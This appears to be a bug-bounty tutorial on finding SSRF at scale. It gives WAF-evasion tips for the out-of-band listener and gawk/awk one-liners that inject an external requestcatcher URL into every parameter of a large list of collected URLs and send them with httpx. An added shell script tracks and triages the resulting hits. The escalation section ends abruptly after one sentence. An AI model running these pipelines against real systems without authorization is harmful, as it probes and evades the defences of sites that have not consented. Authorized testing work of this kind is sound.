Server-Side Request Forgery (SSRF) is a high-impact vulnerability that occurs when an attacker can make a server-side application issue a request (usually HTTP, but whatever URL schemes the server's client library accepts) to a destination of the attacker's choosing. In effect the vulnerable server becomes a proxy for the attacker, reaching internal hosts and services that perimeter network controls would otherwise block.

Phase 1: The Recon Aggregation

The first step to finding SSRF is having a large pool of URLs to test. I won't walk you through URL collection (being handy with open source tools is part of your job), but here is the stack you should be using to build your allurls.txt:

  • Passive Discovery: waymore, gau, gauplus, waybackurls, plus the urlscan.io, AlienVault OTX and VirusTotal sources (haktrails, which queries the SecurityTrails API, also belongs here rather than with the crawlers).
  • Active Discovery: Burp Suite's crawler and active scan, katana, and gospider.

Phase 2: The Setup (Bypassing the WAF)

To confirm an SSRF you need an out-of-band listener (a "pingback" server) that logs every request it receives, because a blind SSRF shows nothing in the HTTP response you get back.

  • Common Choice: interactsh. interactsh-client registers a random subdomain on a public interactsh server and prints every DNS and HTTP interaction that reaches it.
  • Pro Tip: Many WAFs (Web Application Firewalls) blacklist the public interactsh domains. Two ways round this: run your own interactsh-server on a domain you control, or hide the listener behind a different hostname, e.g. a tinyurl link that redirects to it or a requestcatcher.com subdomain. A shortener only works when the target's HTTP client follows redirects; if it does not, the request is made but you never see it.

Phase 3: Targeted Parameter Injection

The key to successful automation is tracking. If you blast 10,000 URLs and get one hit, you need to know exactly which URL, and which parameter in it, triggered it.

Technique 1: Protocol-Specific Replacement

This gawk one-liner targets parameters whose value already looks like a URL (starting with http:// or https://, either plain or percent-encoded as http%3A%2F%2F) and swaps the host for your listener, appending a unique ID (emon1, emon2, emon3, ...) to each injected value so you can map a hit back to the source URL and parameter. The counter advances per matched parameter, not per URL, so a URL with two URL-valued parameters gets two IDs. grep keeps only the URLs that were actually modified, and httpx -fr follows redirects so that a redirect to your listener also produces a hit.


Bash

# Three-argument match() is a gawk extension. Parameter names stop at '&' or '=',
# and a percent-encoded scheme is re-emitted encoded so the target decodes it as before.
cat allurls.txt | gawk 'BEGIN{c=1}{s=$0;out="";while(match(s,/([?&][^=&]+=)(https?:\/\/|https?%3A%2F%2F)([^\/&?]+)([^&]*)/,m)){enc=(tolower(m[2])~/%3a/); proto=(tolower(m[2])~/^https/?"https":"http"); sep=(enc?"%3A%2F%2F":"://"); out=out substr(s,1,RSTART-1) m[1] proto sep "ashiquremon.requestcatcher.com/emon" c m[4]; c++; s=substr(s,RSTART+RLENGTH)}; print out s}' | grep -i requestcatcher | httpx -silent -fr
[Screenshot: the pingback proof of concept as it appeared in the requestcatcher log]

Technique 2: Blind Parameter Injection

Sometimes parameters whose values don't look like URLs are still handed to a server-side fetcher. This command replaces every parameter value with your listener URL, giving each parameter its own ID, so a single hit still tells you which URL and which parameter was injected. Flag-style parameters without an "=" are left untouched.


Bash

# POSIX awk only: split on the first '?', then number the parameters in order so IDs stay stable.
cat allurls.txt | awk 'BEGIN{c=1}{q=index($0,"?"); if(q==0){print; next} base=substr($0,1,q-1); n=split(substr($0,q+1),p,"&"); out=""; for(i=1;i<=n;i++){ if(index(p[i],"=")){sub(/=.*/,"=https://ashiquremon.requestcatcher.com/emon" c,p[i]); c++} sep=(i>1)?"&":""; out=out sep p[i]} print base "?" out}' | grep -i requestcatcher | httpx -silent -fr

Pro Tip: check the source address (and User-Agent) of every hit in the listener log. Because httpx runs with -fr, a request that arrives from your own IP means the target answered with a redirect to your listener and httpx followed it: that is an Open Redirect, not SSRF. It is still worth escalating (open redirects chained into OAuth or password-reset flows are a classic route to account takeover). A hit from the target's IP, its cloud egress range, or any address you don't recognise means the server itself fetched your URL: you've found a potential SSRF.
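Both one-liners above pipe the mutated URLs straight into httpx, so nothing records which ID went into which URL and parameter; the mapping exists only in your head. The script below is an added example, not code from the original post: it performs the blind injection while writing an ID-to-source mapping file, resolves an ID seen in the listener back to its URL and parameter, and applies the source-IP rule from the tip above to triage hits. It uses POSIX sh and awk only (no gawk extensions). The listener hostname, the tab-separated mapping file, and the "source IP, request path" shape of the log lines are assumptions made for the example; substitute your own listener and whatever fields your listener actually reports.

```shell
#!/bin/sh
# Added example: tracked parameter injection plus hit triage.
# Assumptions (not from the original post): the listener hostname is a
# placeholder, the mapping file is tab-separated "id<TAB>param<TAB>url", and
# listener hits are fed in as "<source ip> <request path>" lines.
LISTENER="${LISTENER:-yourname.requestcatcher.com}"

# inject_params PREFIX MAPFILE
# Reads URLs on stdin. Every "name=value" parameter becomes
# name=https://$LISTENER/PREFIX<n> with a unique n, and one mapping line per
# injected parameter is appended to MAPFILE. URLs without a query string are
# skipped because there is nothing to inject into.
inject_params() {
    awk -v prefix="$1" -v map="$2" -v host="$LISTENER" '
    BEGIN { c = 0 }
    {
        url = $0
        q = index(url, "?")
        if (q == 0) next
        base = substr(url, 1, q - 1)
        n = split(substr(url, q + 1), p, "&")
        out = ""
        for (i = 1; i <= n; i++) {
            eq = index(p[i], "=")
            piece = p[i]                  # flag-style "name" without "=": left untouched
            if (eq > 0) {
                c++
                name = substr(p[i], 1, eq - 1)
                piece = name "=https://" host "/" prefix c
                printf "%s%d\t%s\t%s\n", prefix, c, name, url >> map
            }
            sep = (i > 1) ? "&" : ""
            out = out sep piece
        }
        print base "?" out
    }'
}

# resolve_hit ID MAPFILE
# Prints "param<TAB>original url" for the ID carried by a pingback
# (nothing if the ID is unknown).
resolve_hit() {
    awk -F '\t' -v id="$1" '$1 == id { print $2 "\t" $3 }' "$2"
}

# triage_log MY_IP MAPFILE
# Reads "<source ip> <request path>" lines on stdin. A hit whose source is the
# machine running httpx arrived through a redirect that httpx followed (open
# redirect); any other source means the target fetched the URL itself.
triage_log() {
    while read -r src path; do
        id="${path#/}"
        id="${id%%[/?]*}"                 # keep only the PREFIX<n> path segment
        kind="ssrf-candidate"
        [ "$src" = "$1" ] && kind="open-redirect"
        printf '%s\t%s\t%s\n' "$kind" "$src" "$(resolve_hit "$id" "$2")"
    done
}

# Constructed sample data: not real targets and not real listener traffic.
SAMPLE_URLS='https://target.example/api/fetch?url=https://cdn.example/img.png&size=200
https://target.example/ping?host=10.0.0.5&debug
https://target.example/static/logo.png'
SAMPLE_HITS='203.0.113.7 /emon3
198.51.100.20 /emon1'

demo() {
    map=$(mktemp)
    printf '%s\n' "$SAMPLE_URLS" | inject_params emon "$map"
    printf '%s\n' "$SAMPLE_HITS" | triage_log 203.0.113.7 "$map"
    rm -f "$map"
}
demo
```

In practice you would replace the demo with `cat allurls.txt | inject_params emon map.tsv | httpx -silent -fr`, keep map.tsv next to the scan, and feed the listener's hits through triage_log once the run finishes; the open-redirect line tells you which URLs to chase for redirect escalation and the ssrf-candidate lines which ones to take into Phase 4.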

Phase 4: Escalation (The "Pro" in the Title)

A simple HTTP pingback on its own is often rated Low or Informational. To get that Critical bounty, you must demonstrate impact:

Thanks for reading